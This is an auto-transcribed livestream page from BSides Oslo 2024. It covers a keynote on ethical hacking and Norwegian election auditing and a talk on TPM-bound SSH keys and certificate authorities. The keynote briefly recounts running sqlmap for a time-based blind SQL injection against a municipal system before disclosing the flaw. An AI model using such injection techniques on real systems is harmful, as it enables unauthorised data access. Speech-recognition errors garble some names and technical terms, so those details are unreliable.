BSides Oslo 2024

Name: BSides Oslo 2024
Uploaded: 2024-10-14
Duration: 4 h 57 min 30 s
Description: Live stream of the BSides Oslo 2024 conference. Program: 08:55 : Intro 09:00 : Keynote - Exploring the World of Ethical Hacking: From Web Vulnerabilities to Election Security - Hallvard Nygård 09:45 : SSH authentication using user and machine identities - Morten Linderud 10:30 : Break 10:55 : Chrom

BSides Oslo · 20244:57:30684 viewsPublished 2024-10Watch on YouTube ↗

Speakers

Hallvard Nygård Morten Linderud Matteo Malvica Karim El Melhaoui Stian Kristoffersen Sofia Lindqvist Antonis Terefos Tom Chothia Kim Engebretsen

About this talk

Live stream of the BSides Oslo 2024 conference. Program: 08:55 : Intro 09:00 : Keynote - Exploring the World of Ethical Hacking: From Web Vulnerabilities to Election Security - Hallvard Nygård 09:45 : SSH authentication using user and machine identities - Morten Linderud 10:30 : Break 10:55 : Chrome Browser Exploitation: from zero to heap sandbox escape - Matteo Malvica 11:40 : Post-compromise: Uncovering Clouds and Assessing at Lightning Speed - Karim El-Melhaoui 12:00 : Lunch 13:00 : End-to-end Supply Chain Integrity - Stian Kristoffersen 13:45 : Http Header Injections: a Splitting Headache - Sofia Lindqvist 14:30 : Break 14:55 : Tales of a Malspam Campaign from a Threat Actor's Perspective - Antonis Terefos 15:15 : Taking a Look at the Cyber Security of Modern Trains - Tom Chothia 16:00 : The Law of Jante (janteloven) in Cybersecurity - Breaking the myth of America's superiority over Norway - Kim Engebretsen 16:20 : Closing note

Show transcript [en]

which means that this is actually active, it's reading this and yeah. So it's a quite hard parameter to use, it was the sort. So I tried out the SQL map, it's a tool for doing injection. So I ran that and got some basic system information and the names of the table from one public entity here and ran that for about eight hours to get that. Because this was a time-based blind SQL injection. So it's the timing on how fast it responds that determines if

the letter you are looking for is the right one. So you need to look for letter by letter, quite time intensive to extract data that way, but it is possible. For the alerts here, I sent it to the creator of the system and also the one that I ran this tool on and their service provider. There's a company running the service for that municipal. I then later also alerted all the rest of the customers because I, of course, have lists of these because I scrape all of the instances of this system.

So does organizations push back and put legal on the case?

I have not experienced that myself. The first day with Remathusen, they were pointing the finger at me. That made the media case more spicy, so they had more to do on the media team that day. But they didn't do anything more than that. But here it is very important to remember the boundaries. If you behave, they will behave.

If you do too much, then you will likely have precautions on whatever action you did. So don't do too much. Do enough to prove the issue. But don't make a copy of the database, because that is never necessary. I often think that if I have enough to make a few slides on a presentation, that is usually enough for me to prove this issue. And it's also usually the same data that I will provide in the alert email that I send them. So you will have some there as well.

So let's turn it over to election, keep our security mindset with us. So the last couple of years, I've spent a lot of time checking the Norwegian election. As I said, I collect data, I try to find systemic issues and make the right people aware. So this is not necessarily like the other cases, the application security is not like that, it's more the election as a whole and it's more on the system and not like specific issues. So a little election 101. There are two essential factors we need to speak about. It's trust and anonymity. Everybody should trust the results of the election. They must understand how the election works. They must know about checks that is in place in the election to get the

right result. It should be transparent so that everybody can audit the election.

The outcome of the election must be hard to change, meaning that we must require many steps and also have many people conspiring to make a change in the election. If one single person or point in the election can be changed without many people being involved, that will be an issue.

For a free election, we also need anonymity. This is so that you, under no circumstance, should be able to identify what somebody voted for. That is not true. So you can avoid pressure on people.

So in the society, we should not have posters saying 50% off for yellow voters, or only red voters allowed. Green voters pay double. or even worse, violence, which can happen. So it's very important that you can't know what somebody voted for.

The Norwegian election, we have three main elections every second year. That is the county and municipal election together, and then the parliament by itself. Next up is the parliament, which is next year. So then the county and municipal election was last year.

There are two main types of voting in Norway. You have the early day voting and election day voting. All the voting are done on physical paper ballots, so no electronic voting in the polling stations. So there's not a computer where you can click on a button for which party you want to vote for. At the polling station, you will be ID checked before you deliver your vote. In early voting, you can vote anywhere in the country. If you vote somewhere other than where you live, that vote will go into an envelope, as you see in the picture here, and will be mailed back to where you live. So your vote will always get back to your local municipal.

At election day, it's only possible to vote where you live, and that's because your vote will be counted in that place.

So the votes are in. Let's count them. The first preliminary counting is manual, meaning that humans will do the counting. We will have a look at that on the next slide. And here I just want to give a big thanks to Patricia, which was mentioned before the before the talk. She was on the barricades in 2017 and is one of the reasons why mandatory manual counting is present in the law today. She put a spotlight on issues with unreliable electronic counting, which was on the full way into the Norwegian election. So most of the municipals, they will do the first count at the polling station with the employees that are present at that time. So I've been on that last

shift at my polling station and have been attending the counting. This is the first counting, and that is what they will be reporting to the public and also to the media when they do the live reporting on election day. The second and final counting can either be manual or electronic, but most municipals will do this electronically today. All the large places will have scanners that have had that for a long time. After they're done, they will send election material further to the county for another county with other equipment. That one is also electronic. So manual counting, just to get a sort of feel for how this actually works. In the first picture here, you have people sorting them into the two different elections.

It will then also be sorted by different parties and if the ballot is stamped. So if it's not stamped, that will be put aside because that is not a valid vote. On the right here, you have after the counting is done. So here we have sorted the ballots. and also counted them and put a Post-it note with how many votes are in this stack. And that is recounted by another person. So two people are counting that. This type of manual counting will have some errors. The discrepancies should be checked and noted. And spot checks should be done.

The counting goes into the electoral record or Norwegian Valgprotokoll. This is the official document from that municipal. So that is what the end result for them will be. This is printed and signed by the local election board, exemplified here by Oslo in the picture. So there will be about 357 of these per election. which makes it above 700 for the two elections last year.

All right, so let's look further into the security and also my investigations for last election. To sum up where we use digital systems in the Norwegian election today, we have two main systems that we use. We have the EVA admin and the EVA scanning. Both are owned and maintained by the Directorate of Elections, so centrally managed. The admin application is a web portal, and the scanning application is a desktop application. First, we have the voter registry, where everybody who can vote will be present, imported data from the central register in Norway. This is used to do the ID check when you cast your vote at the polling station. Then we have the electronic counting that is done in the scanning solution, desktop application with connected

scanners. After that, the result is imported into the admin application again, where the electoral record is produced, the PDF. And then the results are published after that is approved in the application and over to the result page and media. So some questions. Or that these election systems, are they secure? Can election results be changed without anybody knowing? Are some voters excluded, maybe for technical reasons that you didn't think of, intentional or not? Where can we add votes in this election? And what can we check?

So I've tried to answer some of these questions or get answers to them. How can we audit these systems? Do we have the source code? That would be a good start. No. We only have parts of it. We are missing the essential parts, so you can't run the code, which makes it sort of security above security, and still by we have released the source code. The source code is no longer being updated. The last update was in 2019. So my trust in the elections go down without that type of source code.

The argument against is national security and criminal activity can happen.

But I would argue that this piece of code is the execution of the law. So if you don't have the procedure, the code that is executing the law, you are missing a big piece of how it's done. So we should have access to it, I think. If this procedure, whatever the application does, if that was done by a human, you would have that procedure. And we do have that procedure for a lot of the things that is happening in the election, but not when it's a digital system, because then it's scary. I spent a lot of time to try to get a hold of the source code through freedom of information requests, but have stopped looking into that. Because even if we have the running

code, can we trust the system? Is it the same version that is running? We don't know. And given that we are anonymous in the actual election, can we make it verifiable? We could make some hashing algorithms and stuff for making this vote so we can check that your vote was present. But that's just an engineer's wet dream. We can't really do that without losing the anonymity. So in the digital system, we only need one place to exploit, to change the result. and lose that check.

This image you have been looking at is the election system, Eva Admin. It's me that is logged in to the production environment. This is not a bug. This is me as an election official that is doing my job. So it's not a security issue unless you consider me a security issue.

So all systems are buggy. I know systems are buggy. I code things, I work with systems, I make them, I know that things go wrong. And this also includes selection systems. So last election there was at least two instances of issues related to code. or code changes. I've read the incident report. It started out with first a critical issue in the Oslo election. Then they had an emergency release for that bug. And that resulted in another critical issue, which often happens. And the second one was found by me in the election records, which you see behind here.

So I expect this to happen in a system. It's not unusual that bugs occur and things happen. But these are bugs without the intention of changing the result, and even that changed the result. And that just shows that systems are buggy. So can we audit the election without the digital system, without these pieces of procedure that we can't can't

look into. So a couple of slides back, we had this on the wall. So I'm changing out the first one to be the paper ballots and the manual counting. And this is why the manual counting is so important, because then we can check against the result. We have a manual count that has not gone through any system, and we can check that against the results, hopefully. And this is all made possible by the changes in 2018, where it became mandatory to do this manual count after pressure from security professionals like yourself. But first, let's look into the data collection from last year.

So saying this meeting could have been an email. This could have been an API, all these emails. Due to lack of transparency on important data, the Directorate of Elections, from the Directorate of Elections, we need to collect all these records directly from the municipals by asking each one of them. So the data was collected by sending about 1,300 emails. A lot of this is the first request, and then a lot of reminders are nagging to a certain degree. Most of them are quite similar emails, so it's not like I'm typing out all these. But still. The replies

might be questions, might be the correct PDF that I'm looking for, or it might be something else. The results are very,

different in form and shape. So last year, I used some AI to read a lot of these emails and summarize them, and also extract data points from them. So in a way, I just made the missing API and integrated with the municipals by the very ineffective channel of communication, which is email. It's quite slow. As you can see, not all municipals manage to respond in time. I've sent some complaints, but I haven't tried to get it up to 100. It's about 80% to 90%, because I really want to look into the data. I don't want to spend more time on this data collection. So over to the data. Ferdag Kommune has an example of some of the data. The municipal election. Here they found 95

extra votes in the final count. This, according to my code, changed the seeds between two parties. I have simulated the preliminary seeds and got the final seeds from the actual PDF. And the comment was, discrepancy checked by scanning twice. So we ran the scanning twice, same equipment, All the same stuff was the same result. We trust the system. This is the typical example of how the trust is in computers among election officials. A lot of them don't see it with the same security mindset that we would have done.

But I wouldn't trust my own code this much, that's sure.

For the last election, electoral records, here are some of the interesting numbers that I've taken out. So as to previous slides, there was 22 municipals that had change of seats between the first preliminary count and the final count. Some of these might have been explained. There might be votes that my code doesn't pick up. But some of them are also like this one, larger one. that we just saw. Usually this is picked up by others also, so it's not like it's going completely unnoticed. But still, there are some discrepancies. I also have another check for if the difference in vote count is more than 1%. Changes of 1% for one party. So one party is

losing 100 votes and another one is gaining. This isn't typical of what you see. If that is 1% difference, we have 34 of those. And that is a lot. We also have a lot on the ballot stuffing, meaning that there are more votes in the ballot than voters. Because when you check your ID, you will be crossed out. You will be marked that you have voted. And that count of how many are crossed out shouldn't be less than the votes. So if there are more votes than people that should have voted, that is of course an issue. Some of these are quite minor, but might point to something that should be looked into or that the whole election process should have better data on this. 17 of

them was due to the emergency release of the election system while they were doing the election counting. So due to the release, while we were doing counting,

It started, yeah, we got some bugs there. This is the one that we previously looked into.

I did a separate study of Rogaland, where I'm from, to try to see if we can all answer exactly the question I just asked. Can we audit the digital systems Do we have a record of something that is not extracted from that system? You're not meant to read all of this, but just have a look that there are many red boxes. So let's go to the summary. I found that five of the 23 municipals in Rogaland can be audited outside the main election system, so outside that admin system. And when I say I can audit them, this means that I got a copy of some handwritten notes from the actual counting, the manual counting, that they have done. A lot of them said that they had just thrown

out those notes. Some said they had shredded them because it's, I don't know, secret or something. So these are the kind of comments that I responded, they responded with when they answered. I think we can get this number a lot higher by asking all the municipals ahead of time, you should keep these because these are important. But I don't see it as important right now. So then it's just sort of by accident that some kept them and others don't. But this is the counter we want to have higher to be able to audit from end to end. But still, it's really hard to scale an attack against an election that is on paper ballots and with so many places of counting.

Unless you hit the digital systems, of course, where you have one vulnerability and you can change the whole election outcome. But there's also a new spanner that is thrown into the machine. The Norwegian government is investigating and collecting information on both electronic counting at the polling station, meaning that you get not a laptop, but some kind of machine, and you hit a button for your vote. And also looking into online voting, which is another very bad idea. So in the light of what I have presented so far, I hope you see some argument against. If you need it in a more short form and good explanation, I will recommend this video. It is really good and does

go into all the different arguments for this.

And just a couple of words on the online voting. Same argument as on the previous slide, but just a lot more attack surface. Should you really be allowed to send HTTP requests to an election system? Today, we are not allowed. We are blocked from doing that, and that's a good thing. But also other aspects like social engineering, who is actually doing the voting, the undue pressure on people who was present at the voting and pressuring the voter, the one that sent in the vote. And if you say yes to online voting, why not do it by phone? Call in your vote. Would you trust the guy on the other end to write down the right vote

and follow the procedure that is there? All right, so let's recap. We started out by looking at responsible discussion, alerting owners, giving fair time to respond, and that you should behave if you wander into this. Next, we looked at election with a security mindset. Can voters understand the election? Can you understand the election? Can you audit the election? To some degree we can, but there are room for improvements. My biggest scares are in this order, the online voting, electronic voting at polling stations, and no human count of ballots. I wouldn't trust an election with any of these.

So I'm ending on a call to action. You should observe your local election. I can only be at one place at one time. So go to your polling station, watch the count. You are completely allowed to do that. And that's also stated in the new election law. Thankfully, I was rejected at one last last election, but another one let me watch. You're allowed to take pictures, videos, you're allowed to see how the counting is done. You should look for how the ballots are stored after preliminary counting, how they are transported. I've seen a couple of things. The procedure says this, but it's not always followed if people aren't looking. So let's have a look at election. Thank you.

Merci beaucoup, Holvar. C'est une très très intéressante et très intéressante. Nous avons quelques minutes pour questions. N'a personne une question pour Holvar ? Non ? Je vais avoir une question pour les choses s'arrêter. Vous avez dit que vous êtes sous le couvert. Oui. I'm wondering what about the situation makes you feel like you have to be undercover when you're... Yeah, it's not going secretly undercover and hiding my identity. It's just that your local municipal will be asking for people to man the polling station and everybody can basically sign up for stuff like that. You will then be as an employee of the municipal for that day. So it's not a very undercover secret thing. Oh, we have a question

at the back. Coming back to you.

So my question is, since you're that critical of the electronic systems for voting, are you distrustful of electronic systems per se? Is there any systems that you feel are a success when it comes to verifying identities or behaving in the electronic age for citizens? Didn't quite get the last part there, but the first part, the digital systems, they are being checked, they are being penetration tested. They are likely good systems, but it's a systemic thing to not trust them completely because there can be issues and you likely don't know where the issues are. Right, so the last part was if you don't trust your identity in the election system, you trust your identity in other systems like NAV or Skatteetaten. Yeah,

we need digital systems to make this work, otherwise it would be too much. But you should always have rights in every situation and you do have that with NAV as well. But electronic systems are of course effective to do things at a larger scale. All right, thank you very much. This is obviously a sensitive topic, and if you would like to discuss it with Holvod more privately, then he will be available for questions and discussion. Thank you very much. And moving right along with our next speaker, I do have... This year, instead of the usual gift bags, we are giving donations on behalf of our speakers to Mental Health Youngdom in collaboration with Elve Bakken Videregående, Elve Bakken High

School. And we do have some volunteers here today from Elve Bakken High School. Are you in the room? Shout out to... Yeah, they're all there at the back. Thank you. helping with media and making sure that everything goes smoothly. I can also give you a quick update on the shirts. The shirts are lost. Nobody knows where they are. But we're going to get new shirts printed by 4 o'clock today and delivered. So let's have a round of applause for that for Puneeta.

And then we'll have a bigger one when they actually get here. Un grand

grand de blessés. Et le dernier point de logistique, je peux maintenant bienvenue à tous ceux qui sont regardés sur le stream. Nous avons le stream avec son, on a un peu délaié en ce moment. Bienvenue et merci. Et désolé pour le délaié sur le stream. Le stream va conclure.

Before the second break so if you look at the program on the website since you're streaming The last three talks will not be recorded or streamed so saving some good stuff for Those of you who are here in the room with us today Due to the sensitivity of those topics and personal requests

All right with that

The live demo has already crashed and burned.

So we will have at the end of the program, we will have Die Schlussfolgerungen, die Begriffe auszulassen und dann wird der Bar öffnet in Pokalen in einer Stunde, während wir hier aufsetzt und dann zurückkommen wir nach unten für den Diner und Social.

Okay. Just like to build up the suspense before we talk about SSH as if it were a topic that's not already exciting enough. Welcome Morten. Yes, thank you. Give it up for Morten Lindrud.

Is it not?

Why don't you... No, it's still not.

What? Are you still getting a signal? Nei, for det er...

Den diskonekter... Jeg så du hadde noe, men jeg skjønner at du hadde en stund, egentlig. Men den endrer, ikke sant? Så

der skal man egentlig snakke. Ich kann engelschachken mehr anfühlen.

This is, yeah. Yes.

Yes. Sorry about that. Turns out Linux and display stuff is not easy. Yes, so my name is Morten Lindnerud. I'll be talking to you today about SSH and sort of strengthening SSH with multiple signals. We'll take a look at how TPMs do platform attestation, how we can use identity providers to give us stronger identity claims on SSH keys, and how we can distribute SSH keys for servers. My name is Morten Lindru. I go by nickname of FoxBaron on the internet. I have been doing open source software development for around 10 years now. I've been an Arch Linux developer since 2016, where I've been doing packaging, being part of a security team, reproducible builds, and maintaining different projects. I care a lot about usable security tooling, so I've been doing

projects around Secure Boot, UFI, and now lately a bunch of TPM projects. I'm also a board member of Hackeria, who's heavily present today, helping to run the hardware hacking village. When I don't do a lot of open source stuff, I work DevOps at an arcade, working on things like the elections and sort of the visual storytelling stuff.

But first, let's go back to the basics. So we should make an SSH key.

So when we do SSH, we preferably would make a key. We'll call this URI24519. Do you want to passphrase? Yes. Let's use one, two, three, four. One, two, three, four. And now we have made this SSH key, and we want to use this to authenticate. So what we do is that we copy this to our server, which is very important. You can tell because it says important in the domain.

And then we type in the root password. And next time we try to connect to this SSH service, we can do, we type in password, and we get access to our service. So the cool thing about this is that we now have access to a root key with SSH key instead of using the password. And the reason why we can't, why a user can't see the key Is it because of the permission of the key or I accidentally leaked the entire key? So if you now have access to the server, my key is exposed. This is what we usually call key compromises or key extractions. The server is now, you can now copy the key, get access to the service, and it's not connected

to the service it. It's not connected to the SSH service. And we prefer to have better ways of preventing these things. So this is not limited to SSH keys. This can also be done to things like cookies, access tokens, and things that are not directly connected to your hardware or identity, but can be abused without you having access to the key. It can be used for privilege escalation, impersonation, or you can do things like compromising GitHub repositories if you just have access to the key. SSH keys are trivially brute forceable if you know the password. And that's sort of the thing you want to prevent. This isn't really a theoretical thing. You have a fairly recent case now where an APT, I think, that got access to a vulnerable

Jenkins server. They extracted SSH key from Jenkins and then used that to compromise the GitHub repositories of the organization, which is add, we should try and prevent that. This should be more strongly tied to something that would prevent you from taking the key away. You also have GitHub that leaked the RSA host key by accident, which would allow you to do some form of SSH man in the middle attacks or intercept the connection.

So what we would preferably have is some way to have device bound keys. This would prevent people from taking our keys and reuse them without having access to our machines. We'd like to strongly tie this to some identity claims, like your Microsoft identity at work, or your Okta accounts, or some other provider. We would also like to try and make sure that the SCH keys are strongly tied to the machine you're using them on. That would help you prevent things like it would ensure that you also have access to the correct device. And for enterprise setting, you would have to also be from a device that is enrolled MDM or some device that your company has control over. And all of these sort of things together would

prevent you from, would actually allow you to sort of have more trust in SSH keys or other credentials that you would like to secure. So one of the cool things that is ubiquitous these days is Trusted Platform Module, or TPM. You can use YubiKeys to secure them better, but TPMs are very much standard hardware on most machines today. They are secure crypto processors. They do things like check the boot and do platform at the station. That will take a little bit of a look on. They're usually implemented as some form of separate hardware, some sort of module that you connect to your model board. But it can also be implemented as part of your CPU firmware. I think

the Intelium used SGX, but now it's in some other thing, and the AMD secure and cloud thing. It supports platform integrity, which allows you to have some reassurances in how you boot and which state your computer is in. We have a way to do keys and hierarchies, which we should take a look at. And then at the station, which is strongly tied to the machine identity part that we'll look at afterwards. So the way the platform integrity thing works is that we have these platform configuration registers. There are 24 of them.

are some part of the boot chain which is hashed and stored as part of the TPM. These do a lot of things. 1 to 7 is usually the platform registers, a part of the boot chain. And the rest of them is sort of the application or the runtime part of it. For the Linux part of this, there's the UAPI group specification that sort of details which register is used to what. And you can use this to create either policies or lock keys towards TPM.

We also have the concept of hierarchies and seeds. So TPMs are not great computers. What they do is that they have hardcoded seeds and other seeds that you can create keys out of through a key derivative function. And you have three seeds by default. And endorsement seed is the ones that are burned into TPM. And this is for the lifetime of the device. The owner's hierarchy or owner's seed is for a lifetime of the owner that has it that can be rotated. And then we have the null seed, which is basically for the lifetime of the boot machine. The seed gets seeded, and we can sort of do a temporary credentials under that seed. The endorsement seed is chained back to the manufacturer, which means that you can

get a certificate. We can verify that it's an authentic TPM because it was signed by the manufacturer. And you can also do shield the keys, like create some key, extract it out of the TPM, and it will be secure. So the way this works, because it has a terrible API, is that you say which hierarchy you want. So this is the endorsement hierarchy, which produces a context. We can make a key out of that, which in this case is an RSA key. We have then the public part, which is the public cryptography part of it, like the public exponents and stuff. And then we have the private part, which is a sealed blob to the TPM. What that allows us to do is to take the load, this

public and the private part, which can be carried out of the TPM back into the TPM again. And this gives us a new context. We can use that to create some form of data, which we can then sign with some message and use to verify signature.

So TPMs also support policies. That means that you can explain to the TPM what system state you have to use it on, or what user or admin can be able to do some operations with the key, which allow you to only have these keys usable if your system is in a given state. They also support sign policy, so you can rotate them and stuff, but that's a little bit beside what we're going to do today. The main problems with TPMs these days, though, is that they're slow. They are not HMS, HSMs, or hardware security modules. They are fairly slow. Most discrete TPMs do seven or eight signatures a second, which is usable, not super usable for anything that requires a lot of activity.

still has limited cryptography, so most of them these days only have RSA 2048 and then the NIST P256 and 384 curves, and it only really supports the SHA-256 and the SHA-384 hashing algorithms. That means these things are not super secure for quantum cryptography and stuff. I think they're starting to be a bit on the low end of the bit size with the new the new bit demands that NIST is looking at. Also, the things that we need to do is that we need to have some more user-friendly tooling. That's sort of the commands I already showed you. Terrible. I don't remember that offhand, and neither should you. And the other issue, though, is that it's not really supported by OpenSSH, because

OpenSSH doesn't really like TPMs that much. But there are still other ways of using it with SSH. And that's the SSH agent. The SSH agent is some daemon that allows us to hold private keys for SSH. It communicates over a unique socket, and it helps you to do things like caching the password, caching the pin. You can also use it to offload key operations. So the cool thing with SSH is that if you do an SSH agent, you create some key to the agent, and then you list it. So it means that the agent is aware of the key. What we usually do in SSH is that we refer to a private key. But when we have the

agent, we only need to refer to the public part of the key. That can be done as part of the SSH configuration or part of the SSH command line instead. And what that allows us to do is to effectively implement some agent that does the TPM key operations for us and only use the public part to identify the key. Implementing an SSH agent is fairly trivial, at least in Go. It implements sort of a full SSH agent client interface along with an SSH server and makes it easy for us to sort of interact with SSH as a whole. That's what I did. I wrote an SSH TPM agent, which allows us to do TPM keys.

It supports the key creation of the most of the algorithms that SSH TPM does. It also supports some of the open SSH key formats. And it uses the Google Go TPM libraries to do the TPM interactions themselves. So the way this works is that we have some authentication sockets. We have SSH agent. We can then make some TPM key, which uses the same interface-ish as the OpenSSH stuff. We can then create or add the new TPM key to the agent. And the standard SSH tooling is going to be aware of the key. We can also make a normal SSH key, as long as it's one of the supported algorithms. And then we can also import it into the SSH TPM agent, so we can sort of rewrap

the existing key into the TPM. So this is cool. It also has some other support features, like some proxy support and some host key support, which allows you to sort of combine multiple agents into one front end or have your SSH host keys as part of the TPM. But the main question, though, is it secure? So I've

already leaked my key once. So let's do it again. So what I'm going to do now is I'm going to create a

new key in the TPM. The pin is 1234. One, two, three, four. And now we have the key. What I'm going to do now is I'm going to go on my GitHub. We're going to go and add this key to my account. That's the wrong thing. We're going to call this PSADS Oslo. We're going to look at the public part of this key. We're going to take that, add it to our GitHub.

And to prove it works,

so now we have added the key to the agent. And we're going to prove it works by authenticating with GitHub.com. That should work.

And we have authenticated GitHub. If you're interested in the key, that's the key.

So if you try and take a print screen of this or try using it, you won't be able to. And if you want a QR code for it,

I forgot the command line for it because I didn't prepare it. But here's another SSH key that I've uploaded to my GitHub as well with the password 1234, and that's the QR code of the pin. So you can try hack me or my GitHub if you really feel like it. And this sort of solves the SSH key problem we already have. I've given you my key. You're probably not going to be able to use it. which is a huge improvement over what we already have been doing. The way this works is through a spec called the TPM 2.9 key file spec, or that's how we serialize the keys. It's an AS1 format for storing the TPM keys, and it also has several providers. So OpenSL has a TPM

2 provider, and the Linux kernel also support these keys as well. That allows us to use some sort of common format for all of these TPM keys, which allows us to sort of or make keys somewhere else, insert them into our agent, and so on. It supports loadable, importable, and sealed keys. And because there was no good framework for this in Go, I wrote one myself, which is located here. And it allows us to sort of easily create TPM keys. So if you use Go, and you want the TPM key, we can just define a new loadable key. We can give it a description. We can say it's an elliptic curve key with some 256 bytes of security. We can write out the bytes of

this key into a file. And if you want to assign things, we can just use the standard crypto signer API in Go. And it just works, which is quite nice. You can also make keys yourself through the Go TPM API. So the template is how the TPM knows what objects it should create. We can create a loaded object, which is how the TPM loads objects. And then we can sort of serialize our own key with a description and the public and private part of the key. And we can write this out onto a new key file.

And this is sort of a key. It's nice this solves the key problem, but it needs some way to distribute this key. Remember, we're making a CA. We want to have some way of distributing these keys. And SSH has this certificate. SSH is sort of the certificate key types. And they allow us to do TIE has some central authority that can sign SSH certificates that we can use instead. It can be tied to some user. It can be tied to some capabilities of SSH, like if you want a real terminal or not. And you can also do a cool thing, which is giving a time age to the keys. So you can say it's only valid for five days, one week,

or just five minutes if you really want to do that. And what this allows us to do is not only have keys that are non-extractable, but it will also help us have keys that are short-lived, which helps sort of lessen the compromises of it. So another goal example, we define some time range right now and then add five minutes to it. We can make a new Sage key, and then we can do a Sage certificate. So we say it's a user search. We give it a key ID, which is a TPM. which says valid after valid before, which is sort of the time range it should be valid. And we can give it a set of permissions. That's sort of the standard ones. You can do agent

forwarding, you can do port forwarding, you can get the read terminal, and then you can also load the RSC file of the user. This is signed, and then the user can use this to authenticate with the server. And the way that SSH trusts the CA is through this trusted user CA key, SSH the directive.

So now we have sort of solved the...

Yeah. So now we have device-bound keys, and we have some way of distributing them through a SEO authority. Now we sort of want to have identity claims. Identity claims are something that we trust. It can either be sort of your Microsoft

Microsoft authentication portal. It can be signed by Microsoft, and then you can go validate that these attributes to your login is actually from Microsoft itself. This is used to implement it through something called OpenID Connect. And it's standardized across multiple vendors and allows us to do these things. Identity provider is called IDP, and they are signed from provider itself. OpenID Connect is based on something called JVT, or JSON Web Tokens. They can be valid remotely, which means that we can have a token, trade it around, get the public keys from our provider, and then sort of check that they have been signed itself. The way these things work is that we have an algorithm that says how it's

signed. This part is protected by a signature, which has several claims from our identity provider. In this case, we have the email, and we have that email has been verified. And then this entire thing is protected by an RSA signature. So the identity providers themselves, there's a bunch of them. We have Okta, which you can use, Keycloaks for self-hosting, Microsoft, I think, that a lot of people probably use in their DataJ work. And then you also have Google through their portal. All these things that are usable for users, you can make people log in, and you can get back some different claims. Personally, I'm interested in GitHub, but GitHub doesn't actually have OpenID connects towards users, so you can't use them.

So I have to try and work around that. And to figure out how these players are configured, we have this endpoint, .openID configuration. which lists a bunch of the setup for OpenID Connect. This is the one from Microsoft Online. And you see that they support a bunch of different claims. Most of these are connected to their Azure stuff, I think. But they still have a bunch of different claims you can authenticate and verify they actually work. The one thing we are interested in, though, is maybe the ACR value, because that's the value that tells you if you are actually using two-factor authentication or not.

Because just using username and passwords, that's not super useful for us. We want to have some way of actually verifying identities who want strong identity claims. The way people usually do this these days is two-factor authentication. And we want to know from the IDP if we actually have a user that's authenticated with two-factor authentication. This is done with the ACR claim in the OpenID Connect spec. The issue, though, is that it's there, but it's not really standardized. So the values or the two-factor authentication claims from the IDB itself, we don't really know what it means. It's all vendor-specific. And the only two semi-standardized values are silver and bronze, which I don't really know what that entails. But it means that figuring out if somebody is

actually using two-factor authentication isn't easy. Google refuses to tell you this because they don't want vendor lock-in. would prefer that you don't know. Microsoft gives you some of these values, but I couldn't figure out what the values were. So I needed another way of supporting IDP providers without having to hard code a bunch of identity providers and figuring out how they work. So Sigstore is a Linux Foundation project. It's mostly used for keyless signing, which we don't really care about in this context. But what they do have is that they have a public for good federated IDP, which is hosted by Links Foundation. It does identity providers for us. So you can do Microsoft, Google, GitHub through a single identity provider. And as long as

we decide that we trust Sigstore, then this probably works for us. And this sort of, what should I say, quick hack to get this working instead of sort of hard coding all of the different providers.

So the next issue though is how do we know that the authentication that we want is actually from the CA. So we want the certificate authority and we want some identity claim, but we don't want any claim. We want the claim or we want identity, the login that the CA has requested or not. Because if we have no way of verifying it, then somebody can just man-mittle some login through an IDP provider. And then they can just send it to us and we'll just blindly trust it. So we need some way of figuring out how if this actually belongs to us. So I spent a day looking at this list of values that we can control, how we can use this to insert

something that we can check for. And after staring at it for a bit too long, I realized that the nonce is client-provided. So that's supposed to be make sure that we don't sort of reuse the authentication scheme. But that also means that we can insert whatever value we want. So I decided that we just, the CA can make a random string, insert it into the nonce, and we can just check for it instead of doing another dance with it. So the issue then, so the goal then is that our CA is going to give our clients some value. This value has to be present in the sign-in of the service we have, and then it's signed. And that probably gives us this claim that

the identity provider has signed an authentication request from us at some point. So we now have device bound keys. We have identity claims, or some way of at least ensuring that we have identity claims. The next step, though, is that we want to make sure that the device is the one that we are using. You probably want some device that's from your enterprise or some from your organization. So you need some way to prove that this machine is from us. So machine identities.

When people work from home and stuff, we don't have a lot of control. Some people log in to their internal services from their home machine because it's practical instead of carrying your work machine everywhere. But if you have a lot of access, like on SSH, you preferably would not want that. You want it from a machine that you know is good that you control from enterprise. So the endorsement keys from TPMs is sort of the hard-coded one for a lifetime of the machine. It can't sign things. So the TPM people decided that we need something more complicated instead called credential protection. And we are attestation keys. In theory, this should prevent, should give us some form of anonymization so that if you want the identity

of a machine, you can do that without actually disclosing which machine it is, which is a bit interesting, but we don't care about that. So we're just going to do credential protection with the endorsement themselves. And the way the TPM works with this is that they have something called Certify, and that's session keys. So Certify allows us to verify or sign that an object was created on the TPM. TPMs have some strings that will refuse to sign, and that allows us to ensure that sort of a key was created on this TPM, and that the TPM has actually signed this. We have a bunch of attributes that says that the TPM key can't be exported out of the TPM itself. And then we can sign all of this. And

because of that session key, we can change this back to the endorsement key itself.

So the way this sort of challenge work is that the credential protection proves possession of some machine resident key. It's a shared secret. It's encrypted. And we can do these DOMs remotely, send it to the TPM, and then TPM can unlock it. And what that proves is that TPM we send the encrypted credential to is from a key that's on the TPM itself. So credential activate. is the thing that we have to run on the local on TPM. And makeCredential is sort of the encryption operation itself. It's not unique to TPM. We can do this remotely with just public information from the TPM. And then we can send it back. So the way you prove

position is that we use makeCredential on the CA. We have the endorsement key. We have some attestation key. And we have something that we want to decrypt. We send this blob to the client or the agent himself. The client is going to decrypt that blob. It's going to send this blob or the secret string or whatever we wanted to decrypt back to the CA. And that helps us to prove possession of the machine that we're actually using. So that means that we have device bound keys, we have identity claims, and we have some way to do machine identity.

Yes, so the SSH agent is going to do the TPM key operations for us. We have a way to prove possession of identity and the machine. So this leads to the thing I've been hacking on since summer, which is SSH TPM CA authority. So let's see if this demo actually works. So what we are now going to do is that we're going to run the CA authority. And this is

effectively the CA. It runs locally in this case because it's easy. And I'm first going to SSH into my NAS server at home. This should fail. It doesn't fail. OK. We're going to try a sage. And now we get the password prompt to the client up there, just with ECBDC. And what I'm going to do now is I'm going to run the authority.

And then I'm going to SSH into my NAS. This NAS is then going to open the SIG store identity provider. I'm going to click Login on GitHub. And then we authenticated. It's going to issue a short-lived certificate. And it's going to SSH into my server. And if you look at the output of the SSH agent, we see that this has provision elliptic curve, the SA key, and the certificate as well. Yes.

So what this is effectively is that the certificates, these provisions, are short-lived. They last five minutes, and then we need another one. We have done some way of identity authentication through an OpenID Connect provider. And behind the scenes, we've also done the machine identity parts of it, which is the credential protections. Also, a cool part about this is that we haven't actually re-implemented either the server or the client. We're just hooking into the agent and then using that instead. Other solutions, like the teleport client server stuff, involves that you have to do full buy, not the SSH server and the client, which is probably a hard sell on a lot of enterprises, or you yourself, if you want to use this. And this is just a

